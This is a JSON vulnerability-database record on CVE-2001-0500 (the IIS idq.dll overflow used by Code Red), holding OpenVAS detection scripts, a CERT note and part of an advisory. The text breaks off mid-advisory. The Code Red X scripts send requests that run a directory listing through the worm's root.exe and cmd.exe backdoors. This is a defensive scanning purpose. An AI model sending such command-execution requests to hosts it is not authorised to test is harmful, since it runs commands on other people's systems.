{"id": "OPENVAS:136141256231010713", "type": "openvas", "bulletinFamily": "scanner", "title": "CodeRed version X detection", "description": "Your machine is infected with the ", "published": "2005-11-03T00:00:00", "modified": "2020-05-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010713", "reporter": "Copyright (C) 2001 SecuriTeam", "references": ["http://www.securiteam.com/securitynews/5GP0V004UQ.html", "http://www.cert.org/advisories/CA-2001-11.html", "http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp", "http://www.securiteam.com/windowsntfocus/5WP0L004US.html"], "cvelist": ["CVE-2001-0500"], "lastseen": "2020-05-08T08:39:58", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0500"]}, {"type": "exploitdb", "idList": ["EDB-ID:20930", "EDB-ID:20932", "EDB-ID:16472", "EDB-ID:20933", "EDB-ID:20931"]}, {"type": "openvas", "idList": ["OPENVAS:10695", "OPENVAS:10713", "OPENVAS:136141256231010695"]}, {"type": "cert", "idList": ["VU:952336"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:1738", "SECURITYVULNS:DOC:1737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82956"]}, {"type": "canvas", "idList": ["MS01_033"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IIS/MS01_033_IDQ"]}, {"type": "osvdb", "idList": ["OSVDB:568"]}, {"type": "nessus", "idList": ["IIS_ISAPI_OVERFLOW.NASL"]}], "modified": "2020-05-08T08:39:58", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-05-08T08:39:58", "rev": 2}, "vulnersScore": 7.4}, "pluginID": "136141256231010713", "sourceData": "# OpenVAS Vulnerability Test\n# Description: CodeRed version X detection\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10713\");\n script_version(\"2020-05-04T11:06:55+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 11:06:55 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0500\");\n script_name(\"CodeRed version X detection\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_copyright(\"Copyright (C) 2001 SecuriTeam\");\n script_family(\"Malware\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"embedded_web_server_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/banner\");\n\n script_tag(name:\"solution\", value:\"1) Remove the file root.exe from both directories:\n\n \\inetpub\\scripts\n\n and\n\n \\program files\\common files\\system\\msadc\n\n 2) Install an updated antivirus program (this will remove the Explorer.exe Trojan)\n\n 3) Set SFCDisable in hklm\\software\\microsoft\\windows nt\\currentversion\\winlogon to: 0\n\n 4) Remove the two newly created virtual directories: C and D (Created by the Trojan)\n\n 5) Make sure no other files have been modified.\n\n It is recommended that hosts that have been compromised by Code Red X would reinstall the operating system from scratch and patch it accordingly.\");\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/securitynews/5GP0V004UQ.html\");\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/windowsntfocus/5WP0L004US.html\");\n script_xref(name:\"URL\", value:\"http://www.cert.org/advisories/CA-2001-11.html\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp\");\n\n script_tag(name:\"summary\", value:\"Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nif( http_get_is_marked_embedded( port:port ) )\n exit( 0 );\n\nsig = http_get_remote_headers(port:port);\nif( !sig || \"IIS\" >!< sig )\n exit(0);\n\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nreq = http_get(item:\"/scripts/root.exe?/c+dir+c:\\+/OG\", port:port);\nsend(socket:soc, data:req);\nbuf = http_recv(socket:soc);\nhttp_close_socket(soc);\n\npat1 = \"<DIR>\";\npat2 = \"Directory of C\";\n\nif ( (\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n{\n security_message(port);\n exit(0);\n} else {\n\n soc = http_open_socket(port);\n if ( ! soc )\n exit(0);\n\n req = http_get(item:\"/c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if ((\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n}\n", "naslFamily": "Malware"}

{"cve": [{"lastseen": "2020-12-09T19:19:24", "description": "Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary commands via a long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files such as default.ida, as commonly exploited by Code Red.", "edition": 5, "cvss3": {}, "published": "2001-07-21T04:00:00", "title": "CVE-2001-0500", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0500"], "modified": "2018-10-12T21:30:00", "cpe": ["cpe:/a:microsoft:internet_information_server:6.0", "cpe:/a:microsoft:indexing_service:*", "cpe:/a:microsoft:index_server:2.0"], "id": "CVE-2001-0500", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0500", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_server:6.0:beta:*:*:*:*:*:*", "cpe:2.3:a:microsoft:indexing_service:*:*:windows_2000:*:*:*:*:*", "cpe:2.3:a:microsoft:index_server:2.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10713", "href": "http://plugins.openvas.org/nasl.php?oid=10713", "type": "openvas", "title": "CodeRed version X detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: codered_x.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: CodeRed version X detection\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.\";\n\ntag_solution = \"1) Remove the file root.exe from both directories:\n\\inetpub\\scripts\n\nand\n\n\\program files\\common files\\system\\msadc\n\n2) Install an updated antivirus program (this will remove the Explorer.exe Trojan)\n3) Set SFCDisable in hklm\\software\\microsoft\\windows nt\\currentversion\\winlogon to: 0\n4) Remove the two newly created virtual directories: C and D (Created by the Trojan)\n5) Make sure no other files have been modified.\n\nIt is recommended that hosts that have been compromised by Code Red X would reinstall the operating system from scratch and patch it accordingly.\n\nAdditional information:\nhttp://www.securiteam.com/securitynews/5GP0V004UQ.html\nhttp://www.securiteam.com/windowsntfocus/5WP0L004US.html\nhttp://www.cert.org/advisories/CA-2001-11.html\nhttp://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp\";\n\n\nif(description)\n{\n script_id(10713); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0500\");\n\n name = \"CodeRed version X detection\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n family = \"Malware\";\n script_family(family);\n\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/banner\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif ( get_kb_item(\"Services/www/\" + port + \"/embedded\") ) exit(0);\n\nsig = get_http_banner(port:port);\nif ( !sig || \"IIS\" >!< sig ) exit(0);\n\nsoc = http_open_socket(port);\nif(soc)\n{\n req = http_get(item:\"/scripts/root.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n pat1 = \"<DIR>\";\n pat2 = \"Directory of C\";\n \n if ( (\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n else\n {\n soc = http_open_socket(port);\n if ( ! soc ) exit(0);\n req = http_get(item:\"/c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if ((\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-08T11:44:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Indexing Service filter is enabled on the remote Web server.\n\nDescription :\n\nThe IIS server appears to have the .IDA ISAPI filter mapped.\n\nAt least one remote vulnerability has been discovered for the .IDA\n(indexing service) filter. This is detailed in Microsoft Advisory\nMS01-033, and gives remote SYSTEM level access to the web server. \n\nIt is recommended that even if you have patched this vulnerability that\nyou unmap the .IDA extension, and any other unused ISAPI extensions\nif they are not required for the operation of your site.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10695", "href": "http://plugins.openvas.org/nasl.php?oid=10695", "type": "openvas", "title": "IIS .IDA ISAPI filter applied", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: iis_ida_isapi.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: IIS .IDA ISAPI filter applied\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# Modified by rd to have a language independent pattern matching, thanks\n# to the remarks from Nicolas Gregoire <ngregoire@exaprobe.com>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_solution = \"To unmap the .IDA extension:\n 1.Open Internet Services Manager. \n 2.Right-click the Web server choose Properties from the context menu. \n 3.Master Properties \n 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration \nand remove the reference to .ida from the list.\n\nIn addition, you may wish to download and install URLSCAN from the\nMicrosoft Technet web site. URLSCAN, by default, blocks all .ida\nrequests to the IIS server.\";\n\ntag_summary = \"Indexing Service filter is enabled on the remote Web server.\n\nDescription :\n\nThe IIS server appears to have the .IDA ISAPI filter mapped.\n\nAt least one remote vulnerability has been discovered for the .IDA\n(indexing service) filter. This is detailed in Microsoft Advisory\nMS01-033, and gives remote SYSTEM level access to the web server. \n\nIt is recommended that even if you have patched this vulnerability that\nyou unmap the .IDA extension, and any other unused ISAPI extensions\nif they are not required for the operation of your site.\";\n\n\nif(description)\n{\n script_id(10695);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0008\");\n script_bugtraq_id(2880);\n script_cve_id(\"CVE-2001-0500\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n name = \"IIS .IDA ISAPI filter applied\";\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n family = \"Web Servers\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\");\n script_mandatory_keys(\"IIS/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n# Check makes a request for NULL.ida\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif ( get_kb_item(\"Services/www/\" + port + \"/embedded\") ) exit(0);\nsig = get_http_banner(port:port);\nif ( sig && \"IIS\" >!< sig ) exit(0);\nif(get_port_state(port))\n{ \n req = http_get(item:\"/NULL.ida\", port:port);\n soc = http_open_socket(port);\n if(soc)\n {\n send(socket:soc, data:req);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n look = strstr(r, \"<HTML>\");\n look = look - string(\"\\r\\n\");\n if(egrep(pattern:\"^.*HTML.*IDQ.*NULL\\.ida.*$\", string:look)) security_message(port);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-08T08:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Indexing Service filter is enabled on the remote Web server.", "modified": "2020-05-04T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010695", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010695", "type": "openvas", "title": "IIS .IDA ISAPI filter applied", "sourceData": "# OpenVAS Vulnerability Test\n# Description: IIS .IDA ISAPI filter applied\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# Modified by rd to have a language independent pattern matching, thanks\n# to the remarks from Nicolas Gregoire <ngregoire@exaprobe.com>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10695\");\n script_version(\"2020-05-04T11:06:55+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 11:06:55 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0008\");\n script_bugtraq_id(2880);\n script_cve_id(\"CVE-2001-0500\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"IIS .IDA ISAPI filter applied\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2001 Matt Moore\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"embedded_web_server_detect.nasl\");\n script_mandatory_keys(\"IIS/banner\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"summary\", value:\"Indexing Service filter is enabled on the remote Web server.\");\n\n script_tag(name:\"insight\", value:\"The IIS server appears to have the .IDA ISAPI filter mapped.\n\n At least one remote vulnerability has been discovered for the .IDA\n (indexing service) filter. This is detailed in Microsoft Advisory\n MS01-033, and gives remote SYSTEM level access to the web server.\n\n It is recommended that even if you have patched this vulnerability that\n you unmap the .IDA extension, and any other unused ISAPI extensions\n if they are not required for the operation of your site.\");\n\n script_tag(name:\"solution\", value:\"To unmap the .IDA extension:\n\n 1.Open Internet Services Manager.\n\n 2.Right-click the Web server choose Properties from the context menu.\n\n 3.Master Properties\n\n 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration\n and remove the reference to .ida from the list.\n\n In addition, you may wish to download and install URLSCAN from the\n Microsoft Technet web site. URLSCAN, by default, blocks all .ida\n requests to the IIS server.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nif( http_get_is_marked_embedded( port:port ) )\n exit( 0 );\n\nsig = http_get_remote_headers(port:port);\nif( sig && \"IIS\" >!< sig )\n exit(0);\n\nreq = http_get(item:\"/NULL.ida\", port:port);\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nsend(socket:soc, data:req);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\nlook = strstr(r, \"<HTML>\");\nlook = look - string(\"\\r\\n\");\nif(egrep(pattern:\"^.*HTML.*IDQ.*NULL\\.ida.*$\", string:look))\n security_message(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:45:15", "bulletinFamily": "info", "cvelist": ["CVE-2001-0500"], "description": "### Overview \n\nA vulnerability exists in the Indexing services used by Microsoft IIS 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions of Windows XP. Exploitations of this vulnerability allows a remote intruder to run arbitrary code on the victim machine.\n\n### Description \n\nThere is a remotely exploitable buffer overflow in the ISAPI (Indexing Service Application Programming Interface) extension (IDQ.DLL) installed with most versions of IIS 4.0 and 5.0. This affects Windows NT 4.0, Windows 2000 (Server and Professional), Windows 2000 Datacenter OEM distributions, Indexing Server 2.0, and the Indexing Services on all Windows 2000 platforms; however, not all of these instances are vulnerable by default. The beta versions of Windows XP are vulnerable by default. \n \nThe only precondition for exploiting this vulnerability is that an IIS server is running with script mappings for Internet Data Administration (.ida) and Internet Data Query (.idq) files. The Indexing Services do not need to be running. As stated by Microsoft in [MS01-033](<http://www.microsoft.com/technet/security/bulletin/ms01-033.asp>): \n \n`The buffer overrun occurs before any indexing functionality is requested. As a result, even though idq.dll is a component of Index Server/Indexing Service, the service would not need to be running in order for an attacker to exploit the vulnerability. As long as the script mapping for .idq or .ida files were present, and the attacker were able to establish a web session, he could exploit the vulnerability.` \n \nWhen this buffer overflow is exploited, a remote user may be able run arbitrary code on the victim machine with SYSTEM privileges (which the IIS service has by default). \n \nMicrosoft has released patches for this vulnerability that can be downloaded from \n \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>) (NT) \n<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800> (Windows 2000) \n \nFor more information, see [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>) and the [eEye Digital Security bulletin](<http://www.eeye.com/html/Research/Advisories/AD20010618.html>). \n \nMicrosoft has released a patch which supercedes the two listed above. Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information. \n \n--- \n \n### Impact \n\nRemote intruders can execute arbitrary code with SYSTEM privileges in the Local System security context. \n \n--- \n \n### Solution \n\nApply patches for vulnerable Windows NT 4.0 and Windows 2000 systems: \nWindows NT 4.0: \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 ](<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833>) \nWindows 2000 Professional, Server and Advanced Server: \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 ](<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800>) \n \nUsers of Windows 2000 Datacenter Server software should contact their original equipment manufacturer (OEM) for patches. \n \nMicrosoft has released a patch which supercedes the two listed above. Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information. \n \n--- \n \n#### Workarounds\n\n \nAll affected versions of IIS/Indexing Services can be protected against exploits of this vulnerbility by removing script mappings for for Internet Data Administration (.ida) and Internet Data Query (.idq) files. However, Microsoft makes no guarantees such mappings will not be recreated when installing other related software components. \n \nUsers of beta copies of Windows XP should upgrade to a newer version of the software when it becomes available. \n--- \n \n### Vendor Information\n\n952336\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft __ Affected\n\nNotified: June 18, 2001 Updated: August 16, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nMicrosoft has released the following advisory regarding this issue: [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft has released a patch which supercedes the ones listed in [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>). Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952336 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms01-033.asp>\n * <http://www.microsoft.com/technet/security/bulletin/ms01-044.asp>\n * <http://support.microsoft.com/support/kb/articles/Q300/9/72.ASP>\n * <http://www.eeye.com/html/Research/Advisories/AD20010618.html>\n * <http://www.microsoft.com/technet/security/iis5chk.asp>\n * <http://www.microsoft.com/technet/security/tools.asp>\n * <http://www.securityfocus.com/bid/2880>\n\n### Acknowledgements\n\nOur thanks to Microsoft Corporation and eEye Digital Security for contributing technical information about this vulnerability.\n\nThis document was written by Jeffrey S. Havrilla\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0500](<http://web.nvd.nist.gov/vuln/detail/CVE-2001-0500>) \n---|--- \n**CERT Advisory:** | [CA-2001-13 ](<http://www.cert.org/advisories/CA-2001-13.html>) \n**Severity Metric:** | 69.30 \n**Date Public:** | 2001-06-18 \n**Date First Published:** | 2001-06-19 \n**Date Last Updated: ** | 2001-08-16 14:28 UTC \n**Document Revision: ** | 30 \n", "modified": "2001-08-16T14:28:00", "published": "2001-06-19T00:00:00", "id": "VU:952336", "href": "https://www.kb.cert.org/vuls/id/952336", "type": "cert", "title": "Microsoft Index Server/Indexing Service used by IIS 4.0/5.0 contains unchecked buffer used when encoding double-byte characters", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "description": "CERT Advisory CA-2001-13 Buffer Overflow In IIS Indexing Service DLL\r\n\r\n Original release date: June 19, 2001\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history is at the end of this file.\r\n\r\nSystems Affected\r\n\r\n * Systems running Microsoft Windows NT 4.0 with IIS 4.0 or IIS 5.0\r\n enabled\r\n * Systems running Microsoft Windows 2000 &#40;Professional, Server,\r\n Advanced Server, Datacenter Server&#41;\r\n * Systems running beta versions of Microsoft Windows XP\r\n\r\nOverview\r\n\r\n A vulnerability exists in the Indexing Services used by Microsoft IIS\r\n 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions\r\n of Windows XP. This vulnerability allows a remote intruder to run\r\n arbitrary code on the victim machine.\r\n\r\n Since specific technical details on how to create an exploit are\r\n publicly available for this vulnerability, system administrators\r\n should apply fixes or workarounds on affected systems as soon as\r\n possible.\r\n\r\nI. Description\r\n\r\n There is a remotely exploitable buffer overflow in one of the ISAPI\r\n extensions installed with most versions of IIS 4.0 and 5.0 &#40;The\r\n specific Internet/Indexing Service Application Programming Interface\r\n extension is IDQ.DLL&#41;. An intruder exploiting this vulnerability may\r\n be able to execute arbitrary code in the Local System security\r\n context. This essentially can give the attacker complete control of\r\n the victim system.\r\n\r\n This vulnerability was discovered by eEye Digital Security. Microsoft\r\n has released the following bulletin regarding this issue:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\n Affected versions of Windows include Windows NT 4.0 &#40;installed with\r\n IIS 4.0 and Index Server 2.0&#41;, Windows 2000 &#40;Server and Professional\r\n with IIS 5.0 installed&#41;, and Windows 2000 Datacenter Server OEM\r\n distributions; however, not all of these instances are vulnerable by\r\n default. The beta versions of Windows XP are vulnerable by default.\r\n\r\n The only precondition for exploiting this vulnerability is that an IIS\r\n server is running with script mappings for Internet Data\r\n Administration &#40;.ida&#41; and Internet Data Query &#40;.idq&#41; files. The\r\n Indexing Services do not need to be running. As stated by Microsoft in\r\n MS01-033:\r\n\r\n The buffer overrun occurs before any indexing functionality is\r\n requested. As a result, even though idq.dll is a component of\r\n Index Server/Indexing Service, the service would not need to be\r\n running in order for an attacker to exploit the vulnerability.\r\n As long as the script mapping for .idq or .ida files were\r\n present, and the attacker were able to establish a web session,\r\n he could exploit the vulnerability.\r\n\r\n This vulnerability has been assigned the identifier CAN-2001-0500 by\r\n the Common Vulnerabilities and Exposures &#40;CVE&#41; group:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500\r\n\r\nII. Impact\r\n\r\n Anyone who can reach a vulnerable web server can execute arbitrary\r\n code in the Local System security context. This results in the\r\n intruder gaining complete control of the system. Note that this may be\r\n significantly more serious than a simple &quot;web defacement.&quot;\r\n\r\nIII. Solution\r\n\r\nApply a patch from your vendor\r\n\r\n Apply patches for vulnerable Windows NT 4.0 and Windows 2000 systems:\r\n\r\n For Windows NT 4.0:\r\n\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833\r\n\r\n For Windows 2000 Professional, Server, and Advanced Server:\r\n\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 \r\n\r\n These patches supersede the ones previously provided in Microsoft\r\n Security Bulletins MS01-025 and MS00-006.\r\n\r\n Users of Windows 2000 Datacenter Server software should contact their\r\n original equipment manufacturer &#40;OEM&#41; for patches. A list of OEM\r\n providers may be found here:\r\n\r\n http://www.microsoft.com/windows2000/datacenter/howtobuy/purchasing/oems.asp\r\n\r\nWorkarounds\r\n\r\n Users of beta copies of Windows XP should upgrade to a newer version\r\n of the software when it becomes available.\r\n\r\n All affected versions of IIS/Indexing Services can be protected\r\n against exploits of this vulnerability by removing script mappings for\r\n for Internet Data Administration &#40;.ida&#41; and Internet Data Query &#40;.idq&#41;\r\n files. However, such mappings may be recreated when installing other\r\n related software components.\r\n\r\nAppendix A. Vendor Information\r\n\r\nMicrosoft 